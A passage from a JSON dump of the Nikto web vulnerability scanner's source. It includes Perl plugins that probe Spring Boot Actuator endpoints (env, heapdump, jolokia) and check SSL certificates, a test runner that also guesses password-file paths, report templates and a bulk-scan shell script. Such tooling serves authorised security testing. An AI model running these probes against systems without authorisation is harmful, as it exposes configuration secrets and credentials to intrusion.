 }\n                }\n\n                last;\n            }\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_springboot.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Scan for exposed Spring Boot Actuator endpoints and basic info leaks\n###############################################################################\n\nuse JSON;\n\nsub nikto_springboot_init {\n    my $id = { name        => \"springboot\",\n               full_name   => \"Spring Boot Actuator endpoint check\",\n               author      => \"Sullo\",\n               description => \"Detects exposed Spring Boot Actuator endpoints and basic info leaks\",\n               hooks       => { scan => { method => \\&nikto_springboot, } },\n               copyright   => \"2025 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub nikto_springboot {\n    my ($mark) = @_;\n    my $root = $mark->{'root'} || '';\n    $root =~ s/\\/$//;    # Remove trailing slash if present\n\n    my @endpoints = qw(\n      /actuator\n      /actuator/health\n      /actuator/info\n      /actuator/env\n      /actuator/mappings\n      /actuator/metrics\n      /actuator/beans\n      /actuator/configprops\n      /actuator/loggers\n      /actuator/threaddump\n      /actuator/auditevents\n      /actuator/httptrace\n      /actuator/scheduledtasks\n      /actuator/heapdump\n      /actuator/jolokia\n      /actuator/prometheus\n      );\n\n    my $host     = $mark->{'hostname'};\n    my $port     = $mark->{'port'};\n    my $proto    = $mark->{'ssl'} ? 'https' : 'http';\n    my $base_url = \"$proto://$host:$port\";\n\n    foreach my $ep (@endpoints) {\n        my $path = $root . $ep;\n        nprint(\"Checking $path\", \"v\", \"springboot\");\n        my ($res, $content, $error, $request, $response) =\n          nfetch($mark, $path, 'GET', '', '', undef, 'springboot');\n        my $ct = $response->{'content-type'} || '';\n\n        # Quick exits\n        if ($res == 404) {\n            next;\n        }\n        elsif ($res != 200 && $res != 404) {\n            nprint(\"$path: Non-200 ($res) - possibly restricted endpoint\", \"v\", \"springboot\");\n            next;\n        }\n\n        # resposnes should be JSON\n        next unless ($ct =~ /application\\/json/i || $content =~ /^\\s*\\{/);\n\n        my $json;\n        eval { $json = decode_json($content); };\n        if ($@ || !$json) {\n            nprint(\"$path: 200 but invalid JSON\", \"v\", \"springboot\");\n            next;\n        }\n\n        # /actuator special handling\n        if ($ep eq '/actuator') {\n            if (exists $json->{'_links'} && ref($json->{'_links'}) eq 'HASH') {\n                my $links = $json->{'_links'};\n                my @found;\n                foreach my $k (keys %$links) {\n                    my $href = $links->{$k}{'href'};\n                    next unless $href;\n                    my $report_val;\n\n                    # If on same host, report only the path; otherwise, report full URL\n                    if ($href =~ m{^$proto://$host(?::$port)?(/.*)$}) {\n                        $report_val = $1;\n                    }\n                    else {\n                        $report_val = $href;\n                    }\n                    push @found, $report_val;\n                    add_vulnerability(\n                        $mark,\n                        \"$report_val: Spring Boot Actuator endpoint discovered via /actuator _links.\",\n                        750001,\n                        \"https://docs.spring.io/spring-boot/docs/current/actuator-api/html/\",\n                        'GET',\n                        $report_val\n                        );\n                }\n            }\n            else {\n                nprint(\"/actuator: 200 but no _links\", \"v\", \"springboot\");\n            }\n            next;\n        }\n\n        # /actuator/health\n        if ($ep eq '/actuator/health') {\n            if (exists $json->{'status'} && $json->{'status'} eq 'UP') {\n                add_vulnerability(\n                        $mark,\n                        \"$path: Spring Boot Actuator health endpoint exposed\",\n                        750002,\n                        \"https://docs.spring.io/spring-boot/docs/current/actuator-api/html/#health\",\n                        'GET',\n                        $path\n                        );\n            }\n            next;\n        }\n\n        # /actuator/info\n        if ($ep eq '/actuator/info') {\n            if (   exists $json->{'build'}\n                && ref($json->{'build'}) eq 'HASH'\n                && exists $json->{'build'}{'version'}) {\n                add_vulnerability(\n                    $mark,\n                    \"$path: Spring Boot Actuator info endpoint exposed (build version: $json->{'build'}{'version'})\",\n                    750003,\n                    \"https://docs.spring.io/spring-boot/docs/current/actuator-api/html/#info\",\n                    'GET',\n                    $path\n                    );\n            }\n            next;\n        }\n\n        # Other endpoints: report if valid, non-empty JSON\n        if (ref($json) eq 'HASH' && scalar(keys %$json) > 0) {\n            add_vulnerability(\n                       $mark,  \"$path: Spring Boot Actuator endpoint exposed (valid JSON response)\",\n                       750004, \"https://docs.spring.io/spring-boot/docs/current/actuator-api/html/\",\n                       'GET',  $path\n                       );\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_ssl.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Test certificate information\n###############################################################################\nsub nikto_ssl_init {\n    my $id = { name        => \"ssl\",\n               full_name   => \"SSL and cert checks\",\n               author      => \"Sullo\",\n               description => \"Perform checks on SSL/Certificates\",\n               hooks       => { scan => { method => \\&nikto_ssl, } },\n               copyright   => \"2010 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub nikto_ssl {\n    my ($mark) = @_;\n\n    if ($mark->{ssl}) {\n        my @cn_names;\n        my @san_names;\n        my $match = 0;\n\n        # Extract CN from subject\n        if ($mark->{'ssl_cert_subject'} =~ /CN=([^$ \\/]+)/) {\n            push(@cn_names, $1);\n        }\n\n        # Extract SAN names\n        if ($mark->{'ssl_cert_altnames'} ne '') {\n            foreach my $n (split(/, /, $mark->{'ssl_cert_altnames'})) {\n                push(@san_names, $n);\n            }\n        }\n\n        # Combine all names for validation\n        my @all_names = (@cn_names, @san_names);\n        @all_names = unique_vals(@all_names);\n\n        # Create detailed name lists for error messages\n        my $cn_list  = @cn_names  ? join(\", \", @cn_names)  : \"none\";\n        my $san_list = @san_names ? join(\", \", @san_names) : \"none\";\n        my $allnames = join(\", \", @all_names);\n\n        foreach my $cert_name (@all_names) {\n            next unless $cert_name;    # Skip empty names\n\n            # straight up match\n            if (lc($mark->{'hostname'}) eq lc($cert_name)) {\n                $match = 1;\n            }\n\n            # wildcard cert\n            elsif ($cert_name =~ /^\\*/) {\n                add_vulnerability($mark,  \"/: Server is using a wildcard certificate: $cert_name\",\n                                  999992, \"https://en.wikipedia.org/wiki/Wildcard_certificate\");\n                $cert_name =~ s/^\\*\\.//;\n                $cert_name = rquote($cert_name);\n\n                # must match leading dot\n                # only one level of subdomain allowed\n                if ($mark->{'hostname'} =~ /^(.*)\\.?$cert_name/i) {\n                    my $matched  = $1;\n                    my $tldcount = ($matched =~ tr/\\.//);\n                    if ($tldcount <= 1) { $match = 1; }\n                }\n            }\n            last if $match;\n        }\n\n        if (!$match) {\n            my $error_msg = \"/: Hostname '$mark->{'hostname'}' does not match certificate names\";\n            $error_msg .= \" (CN: $cn_list, SAN: $san_list)\";\n            add_vulnerability($mark, $error_msg, 999993,\n                              \"https://cwe.mitre.org/data/definitions/297.html\");\n        }\n    }\n}\n\nsub unique_vals {\n    my %seen;\n    grep !$seen{$_}++, @_;\n}\n\n1;\n\n"
  },
  {
    "path": "program/plugins/nikto_tests.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Perform the full database of nikto tests against a target\n###############################################################################\nsub nikto_tests_init {\n    my $id = { name        => \"tests\",\n               full_name   => \"Nikto Tests\",\n               author      => \"Sullo, Tautology\",\n               description => \"Test host with the standard Nikto tests\",\n               copyright   => \"2008 Chris Sullo\",\n               hooks       => {\n                          scan => { method => \\&nikto_tests,\n                                    weight => 99,\n                                    },\n                            },\n               options => {\n                         passfiles => \"Flag to indicate whether to check for common password files\",\n                         all => \"Flag to indicate whether to check all files with all directories\",\n                         report => \"Report a status after the passed number of tests\",\n                         }\n                 };\n    return $id;\n}\n\nsub nikto_tests {\n    my ($mark, $parameters) = @_;\n    return if $mark->{'terminate'};\n    my $data;\n\n    # this is the actual the looped code for all the checks\n    foreach my $checkid (sort keys %TESTS) {\n        return if $mark->{'terminate'};\n\n        # replace variables in the uri\n        my @urilist = change_variables($TESTS{$checkid}{'uri'}, $mark, $checkid);\n\n        # Now repeat for each uri\n      URI: foreach my $uri (@urilist) {\n            return if $mark->{'terminate'};\n            my (%headrs, %flags, $data);\n            if ($TESTS{$checkid}{'headers'} ne '') {\n                my $header = unslash($TESTS{$checkid}{'headers'});\n\n                # Apply variable replacement to headers\n                my @header_lines = split /\\r\\n/, $header;\n                foreach my $h (@header_lines) {\n                    my ($key, $value) = split(/: /, $h);\n                    $key = lc($key);\n\n                    # Apply change_variables to the value part\n                    my @replaced_values = change_variables($value, $mark, $checkid);\n                    foreach my $replaced_value (@replaced_values) {\n                        $headrs{$key} = $replaced_value;\n                    }\n                }\n                $headrs{'host'} = $mark->{'hostname'}\n                  unless ($headrs{'host'});    # Kludge not to override host injection vectors\n                $flags{'noclean'} = 1;\n            }\n            if ($TESTS{$checkid}{'data'} ne '') {\n                $data = unslash($TESTS{$checkid}{'data'});\n                $headrs{'content-length'} = length($data)\n                  unless grep(/^(transfer-encoding|content-length)$/i, keys %headrs);\n            }\n\n            my ($res, $content, $error, $request, $response) =\n              nfetch($mark, $uri, $TESTS{$checkid}{'method'}, $data, \\%headrs, \\%flags, $checkid);\n\n            # DSL matcher expects response headers as a hashref\n            my $response_string = rebuild_response($response, 0);\n            my %response_headers;\n            foreach my $line (split(/\\r?\\n/, $response_string)) {\n                next if $line =~ /^HTTP\\//;    # Skip status line\n                last if $line =~ /^\\s*$/;      # Stop at blank line (end of headers)\n                if ($line =~ /^([^:]+):\\s*(.*)$/) {\n                    my ($name, $value) = (lc($1), $2);\n                    if (exists $response_headers{$name}) {\n                        $response_headers{$name} .= ', ' . $value;\n                    }\n                    else {\n                        $response_headers{$name} = $value;\n                    }\n                }\n            }\n            my $response_headers = \\%response_headers;\n\n            # Extract cookies as a hashref for matcher\n            my %cookies = ();\n            if (ref $response->{'whisker'}->{'cookies'} eq 'ARRAY') {\n                foreach my $cookie (@{ $response->{'whisker'}->{'cookies'} }) {\n                    if ($cookie =~ /^([^=]+)=([^;]*)/) {\n                        $cookies{ lc($1) } = $2;\n                    }\n                }\n            }\n\n            # Use the DSL matcher - now returns (match_status, captured_groups)\n            my ($positive, $reason, $captures) = (0, '', []);\n            my @matcher_result =\n              $TESTS{$checkid}{'matcher'}->($res, $content, $response_headers, \\%cookies);\n\n            my ($match_status, $captured_groups) = @matcher_result;\n            if ($match_status) {\n                $positive = 1;\n                $reason   = 'DSL Match';\n                $captures = $captured_groups || [];\n            }\n\n            # matched on something, check fails/ands\n            if ($positive) {\n\n                # if it's an index.php, check for normal /index.php to see if it's a FP\n                # if ($uri =~ /^\\/index.php\\?/i) {\n                #     my $clean_content = rm_active_content($content, $mark->{'root'} . $uri);\n                #     if (LW2::md5($clean_content) eq $mark->{'FoF'}{'index.php'}{'match'}) {\n                #         next;\n                #     }\n                # }\n\n                # Check user-specified error codes/strings first (highest priority, always wins)\n                # This must be checked before any other 404 detection logic\n                if (defined $VARIABLES{'ERRCODES'} && ref($VARIABLES{'ERRCODES'}) eq 'HASH') {\n                    my $code_str = \"$res\";\n                    if (exists $VARIABLES{'ERRCODES'}->{$code_str}) {\n                        next URI;    # Skip this test, it's a 404\n                    }\n                }\n                if (defined $VARIABLES{'ERRSTRINGS'} && ref($VARIABLES{'ERRSTRINGS'}) eq 'HASH') {\n                    foreach my $pattern (keys %{ $VARIABLES{'ERRSTRINGS'} }) {\n                        if ($content =~ /$pattern/) {\n                            next URI;    # Skip this test, it's a 404\n                        }\n                    }\n                }\n\n             # Lastly check for a false positive based on file extension or type.\n             # We check is_404 when the actual response code is 200, because 404 error pages\n             # can return 200 status codes. However, we skip the check if:\n             # 1. There's a positive BODY match (specific body content indicates real content)\n             # 2. The DSL has an explicit non-200 CODE match (like CODE:404, CODE:403)\n             #    without including 200, as those are intentional matches for specific status codes.\n                my $has_code_match = ($TESTS{$checkid}{'dsl'} =~ /CODE:/i);\n\n                # Check if DSL has an explicit non-200 CODE match that doesn't include 200\n                # (e.g., CODE:404, CODE:403, but not CODE:200 or CODE:200|404)\n                my $has_explicit_non200_code = 0;\n                if ($has_code_match) {\n                    my $includes_code_200 = ($TESTS{$checkid}{'dsl'} =~ /\\bCODE:\\s*200(\\D|$)/i);\n\n                    # If there's a CODE match but it doesn't include 200, skip is_404 check\n                    $has_explicit_non200_code = !$includes_code_200;\n                }\n\n                # Check if DSL has positive BODY patterns (BODY: but not !BODY:)\n                my $has_body_match = ($TESTS{$checkid}{'dsl'} =~ /(?:^|[^!])BODY:/i);\n\n                if (   $res == 200\n                    && !$has_body_match\n                    && !$has_explicit_non200_code\n                    && is_404($mark, $mark->{'root'} . $uri, $response)) {\n                    next;\n                }\n\n                # Process message with captured groups (if any)\n                my $message = $TESTS{$checkid}{'message'};\n                if (@$captures && $message =~ /\\$\\d+/) {\n                    $message = process_captured_groups($message, $captures);\n                }\n\n                # All checks passed, add vulnerability\n                add_vulnerability($mark,                      \"$mark->{'root'}$uri: $message\",\n                                  $checkid,                   $TESTS{$checkid}{'references'},\n                                  $TESTS{$checkid}{'method'}, $mark->{'root'} . $uri,\n                                  $request,                   $response,\n                                  $reason\n                                  );\n            }\n        }\n\n        # Percentages\n        if (   $OUTPUT{'progress'}\n            && $parameters->{'report'}\n            && ($COUNTERS{'totalrequests'} % $parameters->{'report'}) == 0) {\n            status_report();\n        }\n    }    # end check loop\n\n    # Perform mutation tests\n    passchecks($mark) if $parameters->{'passfiles'};\n    allchecks($mark)  if $parameters->{'all'};\n\n    return;\n}\n\nsub passchecks {\n    my ($mark) = @_;\n    my @DIRS   = (split(/ /, $VARIABLES{\"\\@PASSWORDDIRS\"}));\n    my @PFILES = (split(/ /, $VARIABLES{\"\\@PASSWORDFILES\"}));\n    my @EXTS   = qw(asp bak dat data dbc dbf exe htm html htx ini lst txt xml php php3);\n\n    nprint(\"- Performing passfiles mutation.\", \"v\", \"tests\");\n\n    # Update total requests for status reports\n    my @CGIS = split(/ /, $VARIABLES{'@CGIDIRS'});\n    $COUNTERS{'total_checks'} =\n      $COUNTERS{'total_checks'} +\n      (scalar(@DIRS) * scalar(@PFILES)) +\n      (scalar(@DIRS) * scalar(@PFILES) * scalar(@EXTS)) +\n      ((scalar(@DIRS) * scalar(@PFILES) * scalar(@EXTS) * scalar(@CGIS)) * 2);\n\n    foreach my $dir (@DIRS) {\n        return if $mark->{'terminate'};\n        foreach my $file (@PFILES) {\n            next if ($file eq \"\");\n\n            # dir/file\n            testfile($mark, \"$dir$file\", \"passfiles\", \"299998\");\n\n            foreach my $ext (@EXTS) {\n                return if $mark->{'terminate'};\n\n                # dir/file.ext\n                testfile($mark, \"$dir$file.$ext\", \"passfiles\", \"299998\");\n\n                foreach my $cgi (@CGIS) {\n                    $cgi =~ s/\\/$//;\n\n                    # dir/file.ext\n                    testfile($mark, \"$cgi$dir$file.$ext\", \"passfiles\", \"299998\");\n\n                    # dir/file\n                    testfile($mark, \"$cgi$dir$file\", \"passfiles\", \"299998\");\n                }\n            }\n        }\n    }\n}\n\nsub allchecks {\n    my ($mark) = @_;\n\n    # Hashes to temporarily store files/dirs in\n    # We're using hashes to ensure that duplicates are removed\n    my (%FILES, %DIRS);\n\n    # build the arrays\n    nprint(\"- Loading root level files.\", \"v\", \"tests\");\n    foreach my $checkid (keys %TESTS) {\n\n        # Expand out vars so we get full matches\n        my @uris = change_variables($TESTS{$checkid}{'uri'}, $mark, $checkid);\n\n        foreach my $uri (@uris) {\n            my $dir  = LW2::uri_get_dir($uri);\n            my $file = $uri;\n\n            if ($dir ne \"\") {\n                $DIRS{$dir} = \"\";\n                $dir  =~ s/([^a-zA-Z0-9])/\\\\$1/g;\n                $file =~ s/$dir//;\n            }\n            if (($file ne \"\") && ($file !~ /^\\?/)) {\n                $FILES{$file} = \"\";\n            }\n        }\n    }\n\n    # Update total requests for status reports\n    $COUNTERS{'total_checks'} = $COUNTERS{'total_checks'} + (keys(%DIRS) * keys(%FILES));\n\n    # Now do a check for each item - just check the return status, nothing else\n    foreach my $dir (keys %DIRS) {\n        foreach my $file (keys %FILES) {\n            return if $mark->{'terminate'};\n            testfile($mark, \"$dir$file\", \"all checks\", 299999);\n        }\n    }\n}\n\nsub testfile {\n    my ($mark, $uri, $name, $tid) = @_;\n    return if $mark->{'terminate'};\n    my ($res, $content, $error, $request, $response) =\n      nfetch($mark, $uri, \"GET\", \"\", \"\", \"\", \"Tests: $name\");\n    nprint(\"- $res for $uri (error: $error)\",\n           \"v\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n    if ($error) {\n        $mark->{'total_errors'}++;\n        nprint(\"+ ERROR: $uri returned an error: $error\",\n               \"e\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n        return;\n    }\n    if ($res == 200) {\n        add_vulnerability($mark, \"$uri: file found during $name mutation\",\n                          $tid, \"\", \"GET\", $uri, $request, $response);\n    }\n}\n\n1;\n"
  },
  {
    "path": "program/templates/htm_close.tmpl",
    "content": "<p class=\"copyright\">&copy; 2008 Chris Sullo</p>\n\n<!-- (c) 2008 Chris Sullo -->\n\n</body>\n</html>\n"
  },
  {
    "path": "program/templates/htm_end.tmpl",
    "content": "<div>\n<p></p>\n<table class=\"headerTable\">\n <tr>\n  <td>Host Summary</td>\n </tr>\n</table>\n<table  class=\"dataTable\">\n <tr>\n  <td class=\"column-head\">Start Time</td>\n  <td>#TEMPL_START#</td>\n </tr>\n <tr>\n  <td class=\"column-head\">End Time</td>\n  <td>#TEMPL_END#</td>\n </tr>\n <tr>\n  <td class=\"column-head\">Elapsed Time</td>\n  <td>#TEMPL_ELAPSED# seconds</td>\n </tr>\n <tr>\n  <td class=\"column-head\">Statistics</td>\n  <td>#TEMPL_STATISTICS#</td>\n </tr>\n</table>\n</div>\n<p></p>\n"
  },
  {
    "path": "program/templates/htm_host_head.tmpl",
    "content": "<div>\n<a name=\"#TEMPL_HCTR#\"></a>\n<table class=\"headerTable\">\n <tr>\n   <td>#TEMPL_HOSTNAME# / #TEMPL_IP# port #TEMPL_PORT#</td>\n </tr>\n</table>\n<table class=\"dataTable\">\n <tr>\n   <td class=\"column-head\">Target IP</td>\n   <td>#TEMPL_IP#</td>\n </tr>\n <tr>\n   <td class=\"column-head\">Target hostname</td>\n   <td>#TEMPL_HOSTNAME#</td>\n </tr>\n  <tr>\n   <td class=\"column-head\">Target Port</td>\n   <td>#TEMPL_PORT#</td>\n </tr>\n  <tr>\n   <td class=\"column-head\">HTTP Server</td>\n   <td>#TEMPL_BANNER#</td>\n </tr>\n <tr>\n   <td class=\"column-head\">Site Link (Name)</td>\n   <td><a href=\"#TEMPL_LINK_NAME#\">#TEMPL_LINK_NAME#</a></td>\n </tr>\n <tr>\n   <td class=\"column-head\">Site Link (IP)</td>\n   <td><a href=\"#TEMPL_LINK_IP#\">#TEMPL_LINK_IP#</a></td>\n </tr>\n#TEMPL_SSL_SUBJECT_ROW#\n<tr><td class=\"column-head\">SSL Certificate Subject</td><td>#TEMPL_SSL_SUBJECT#</td></tr>\n#TEMPL_SSL_CN_ROW#\n<tr><td class=\"column-head\">SSL Certificate CN</td><td>#TEMPL_SSL_CN#</td></tr>\n#TEMPL_SSL_SAN_ROW#\n<tr><td class=\"column-head\">SSL Certificate SAN</td><td>#TEMPL_SSL_SAN#</td></tr>\n#TEMPL_SSL_CIPHERS_ROW#\n<tr><td class=\"column-head\">SSL Ciphers</td><td>#TEMPL_SSL_CIPHERS#</td></tr>\n#TEMPL_SSL_ISSUER_ROW#\n<tr><td class=\"column-head\">SSL Certificate Issuer</td><td>#TEMPL_SSL_ISSUER#</td></tr>\n </table>\n</div>\n<p></p>\n"
  },
  {
    "path": "program/templates/htm_host_item.tmpl",
    "content": "<table class=\"dataTable\">\n  <tr>\n    <td class=\"column-head\">URI</td>\n    <td>#TEMPL_URI#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">HTTP Method</td>\n    <td>#TEMPL_HTTP_METHOD#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">Description</td>\n    <td>#TEMPL_MSG#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">Link</td>\n    <td>\n      <a href=\"#TEMPL_ITEM_NAME_LINK#\">#TEMPL_ITEM_NAME_LINK#</a><br>\n    </td>\n  </tr>\n#TEMPL_REFERENCES_ROW#\n  <tr>\n    <td class=\"column-head\">Reference(s)</td>\n    <td>#TEMPL_REFERENCES#</td>\n  </tr>\n</table>\n"
  },
  {
    "path": "program/templates/htm_start.tmpl",
    "content": "<!DOCTYPE html>\n<html>\n<head>\n <meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\">\n <title>Nikto Report</title>\n <style type=\"text/css\">\n  .dataTable\n  {\n   font-family: tahoma, sans-serif;\n   font-size: 11pt; \n   font-weight: normal; \n   color: #000066;\n   background: #EEEEEE;\n   border: thin solid black;\n   width: 95%;\n  }\n  .headerTable\n  {\n   font-family: tahoma, sans-serif;\n   font-size: 15pt; \n   font-weight: normal; \n   color: white;\n   background: #000066;\n   border: thin solid black;\n   width: 300px;\n  }\n  .column-head\n  {\n   width: 15em;\n   font-weight:bold;\n   vertical-align: top;\n  }\n  .copyright\n  {\n   font-family: tahoma, sans-serif;\n   font-size: 10pt;\n   font-weight: normal;\n   font-style: italic;\n   color: black;\n  }\n  body\n  {\n   background: white;\n  }\n </style>\n</head>\n<body>\n"
  },
  {
    "path": "program/templates/htm_summary.tmpl",
    "content": "<p></p>\n<table class=\"headerTable\">\n  <tr>\n    <td>Scan Summary</td>\n  </tr>\n</table>\n<table class=\"dataTable\">\n  <tr>\n    <td class=\"column-head\">Software Details</td>\n    <td><a href=\"http://cirt.net/\">Nikto #TEMPL_NIKTO_VER#</a></td>\n  <tr>\n    <td class=\"column-head\">CLI Options</td>\n    <td>#TEMPL_NIKTO_CLI#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">Hosts Tested</td>\n    <td>#TEMPL_NIKTO_HOSTS_TESTED#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">Start Time</td>\n    <td>#TEMPL_SCAN_START#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">End Time</td>\n    <td>#TEMPL_SCAN_END#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">Elapsed Time</td>\n    <td>#TEMPL_SCAN_ELAPSED#</td>\n  </tr>\n</table>\n<p></p>\n"
  },
  {
    "path": "program/templates/nikto.dtd",
    "content": "<?xml encoding=\"UTF-8\"?>\n\n<!ELEMENT niktoscans (niktoscan)+>\n<!ATTLIST niktoscans\n  xmlns CDATA #FIXED ''>\n\n<!ELEMENT niktoscan (scandetails)>\n<!ATTLIST niktoscan\n  xmlns CDATA #FIXED ''\n  hoststest CDATA #REQUIRED\n  nxmlversion CDATA #REQUIRED\n  options CDATA #REQUIRED\n  scanelapsed NMTOKEN #REQUIRED\n  scanend CDATA #REQUIRED\n  scanstart CDATA #REQUIRED\n  version NMTOKEN #REQUIRED>\n\n<!ELEMENT scandetails (item+,statistics)>\n<!ATTLIST scandetails\n  xmlns CDATA #FIXED ''\n  checks CDATA #REQUIRED\n  errors CDATA #REQUIRED\n  hostheader NMTOKEN #REQUIRED\n  siteip CDATA #REQUIRED\n  sitename CDATA #REQUIRED\n  starttime CDATA #REQUIRED\n  targetbanner CDATA #REQUIRED\n  targethostname NMTOKEN #REQUIRED\n  targetip NMTOKEN #REQUIRED\n  targetport CDATA #REQUIRED>\n\n<!ELEMENT item (description,uri,namelink,iplink,references)>\n<!ATTLIST item\n  xmlns CDATA #FIXED ''\n  id CDATA #REQUIRED\n  method NMTOKEN #REQUIRED>\n\n<!ELEMENT statistics EMPTY>\n<!ATTLIST statistics\n  xmlns CDATA #FIXED ''\n  elapsed CDATA #REQUIRED\n  endtime CDATA #REQUIRED\n  itemsfound CDATA #REQUIRED\n  itemstested CDATA #REQUIRED>\n\n<!ELEMENT description (#PCDATA)>\n<!ATTLIST description\n  xmlns CDATA #FIXED ''>\n\n<!ELEMENT uri (#PCDATA)>\n<!ATTLIST uri\n  xmlns CDATA #FIXED ''>\n\n<!ELEMENT namelink (#PCDATA)>\n<!ATTLIST namelink\n  xmlns CDATA #FIXED ''>\n\n<!ELEMENT iplink (#PCDATA)>\n<!ATTLIST iplink\n  xmlns CDATA #FIXED ''>\n\n<!ELEMENT references (#PCDATA)>\n<!ATTLIST references\n  xmlns CDATA #FIXED ''>\n"
  },
  {
    "path": "program/utils/nikto-bulk.sh",
    "content": "#!/usr/bin/env bash\nset -euo pipefail\n\n# Don't run as root\nif [[ \"$(id -u)\" -eq 0 ]]; then\n  echo \"ERROR: Do not run this script as root.\" >&2\n  exit 1\nfi\n\n############################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Run multiple copies of Nikto against a list of targets\n#          on a *nix system with the screen utility.\n############################\n# Paths / config\n############################\nSCRIPT_DIR=\"$(cd -- \"$(dirname -- \"${BASH_SOURCE[0]}\")\" && pwd)\"\n: \"${NIKTO_BIN:=\"${SCRIPT_DIR}/../nikto.pl\"}\"\n\n# Nikto flags (customize here)\n#  \"-S .\"\nNIKTO_FLAGS=(\n  \"-ask\" \"no\"\n  \"-F\" \"html\"\n)\n\n# Where Nikto writes scan results (must be \".\" per your requirement)\nNIKTO_OUT_DIR=\".\"\n# Where this script writes logs (also \".\" per your requirement)\nLOG_DIR=\".\"\n\n############################\n# Runner configuration\n############################\nINPUT=\"${1:-}\"\nMAX_CONCURRENT=\"${2:-5}\"\n\n############################\n# Safety checks\n############################\nif [[ -z \"${INPUT}\" || ! -f \"${INPUT}\" ]]; then\n  echo \"Usage: $0 <targets.txt> [max_concurrent]\" >&2\n  exit 1\nfi\ncommand -v screen >/dev/null 2>&1 || { echo \"Error: 'screen' not found.\" >&2; exit 1; }\n[[ -f \"$NIKTO_BIN\" ]] || { echo \"Error: nikto.pl not found at: $NIKTO_BIN\" >&2; exit 1; }\n\n############################\n# Helpers\n############################\ncount_running() {\n  local count\n  count=$(screen -ls 2>/dev/null | grep -c 'nikbulk_' 2>/dev/null)\n  # Strip all whitespace and ensure it's just a number\n  count=\"${count//[[:space:]]/}\"\n  # Default to 0 if empty or invalid\n  if [[ -z \"$count\" ]] || ! [[ \"$count\" =~ ^[0-9]+$ ]]; then\n    count=0\n  fi\n  printf \"%d\" \"$count\"\n}\n\nsanitize() {\n  echo \"$1\" | tr -c 'A-Za-z0-9._-`' '_' | tr -s '_' | sed 's/^_//;s/_$//'\n}\n\n############################\n# Main loop\n############################\n# First pass: count total valid targets\ntotal_targets=0\nwhile IFS= read -r raw || [[ -n \"$raw\" ]]; do\n  line=\"$(echo \"$raw\" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')\"\n  [[ -z \"$line\" || \"$line\" =~ ^# ]] && continue\n  total_targets=$((total_targets + 1))\ndone < \"$INPUT\"\n\n# Second pass: launch scans with progress indicator\nlinenum=0\n\nwhile IFS= read -r raw || [[ -n \"$raw\" ]]; do\n  line=\"$(echo \"$raw\" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')\"\n  [[ -z \"$line\" || \"$line\" =~ ^# ]] && continue\n\n  linenum=$((linenum+1))\n\n  while [[ \"$(count_running)\" -ge \"$MAX_CONCURRENT\" ]]; do\n    sleep 2\n  done\n\n  url=\"$line\"\n  safe_name=\"$(sanitize \"$url\")\"\n  screen_name=\"nikbulk_${safe_name}_${linenum}\"\n  log_file=\"${LOG_DIR}/${screen_name}.log\"\n\n  echo \"[${linenum} of ${total_targets}] Scanning: $url\"\n  echo \"  screen: $screen_name\"\n  echo \"  log:    $log_file\"\n\n  # Build a safely-quoted command string (no login shell)\n  cmd=\"$(printf '%q ' \"$NIKTO_BIN\" -h \"$url\" -o \"$NIKTO_OUT_DIR\" \"${NIKTO_FLAGS[@]}\")\"\n\n  # Redirect *inside* screen so logs actually capture Nikto stdout/stderr\n  screen -S \"$screen_name\" -d -m bash -c \"$cmd >> $(printf '%q' \"$log_file\") 2>&1\"\n\ndone < \"$INPUT\"\n\necho \"******************************************\"\necho \"All targets queued.\"\necho \"\"\n\n# Monitor screen sessions with live status updates\nmonitor_scans() {\n  # Temporarily disable exit on error within monitor to prevent premature exits\n  set +e\n  local total_scans=$linenum\n  local running=0\n  local last_count=-1\n  local consecutive_zeros=0\n  \n  if [[ \"$total_scans\" -eq 0 ]]; then\n    echo \"No scans to monitor.\"\n    set -e\n    return 0\n  fi\n  \n  # Give sessions a moment to initialize and start launching\n  sleep 2\n  \n  # Show initial message before clearing\n  echo \"Monitoring ${total_scans} scan session(s)...\"\n  echo \"Press Ctrl+C to stop monitoring (scans will continue)\"\n  sleep 0.5\n  \n  # Trap to ensure we can exit cleanly\n  trap 'echo \"\"; echo \"Monitor stopped. Scans continue in background.\"; set -e; exit 0' INT TERM\n  \n  while true; do\n    # Get running count with error handling\n    running=$(count_running 2>/dev/null || echo \"0\")\n    # Strip any whitespace/newlines\n    running=\"${running//[[:space:]]/}\"\n    # Ensure it's a valid number\n    if ! [[ \"$running\" =~ ^[0-9]+$ ]]; then\n      running=0\n    fi\n    \n    # Always update display for live feedback - try multiple clear methods\n    if command -v tput >/dev/null 2>&1; then\n      tput clear 2>/dev/null || true\n    else\n      clear 2>/dev/null || printf '\\033[2J\\033[H' 2>/dev/null || true\n    fi\n    \n    echo \"╔════════════════════════════════════════════════════════╗\"\n    echo \"║          Nikto Bulk Scan Monitor                       ║\"\n    echo \"╚════════════════════════════════════════════════════════╝\"\n    echo \"\"\n    echo \"  Total sessions:  ${total_scans}\"\n    echo \"  Running:         ${running}\"\n    completed=$((total_scans - running)) || completed=0\n    echo \"  Completed:       ${completed}\"\n    echo \"\"\n    \n    if [[ \"$running\" -gt 0 ]]; then\n      echo \"  Active sessions:\"\n      # Get screen sessions and process them without subshell\n      IFS=$'\\n'\n      sessions=($(screen -ls 2>/dev/null | grep 'nikbulk_' 2>/dev/null || true))\n      unset IFS\n      for line in \"${sessions[@]}\"; do\n        [[ -z \"$line\" ]] && 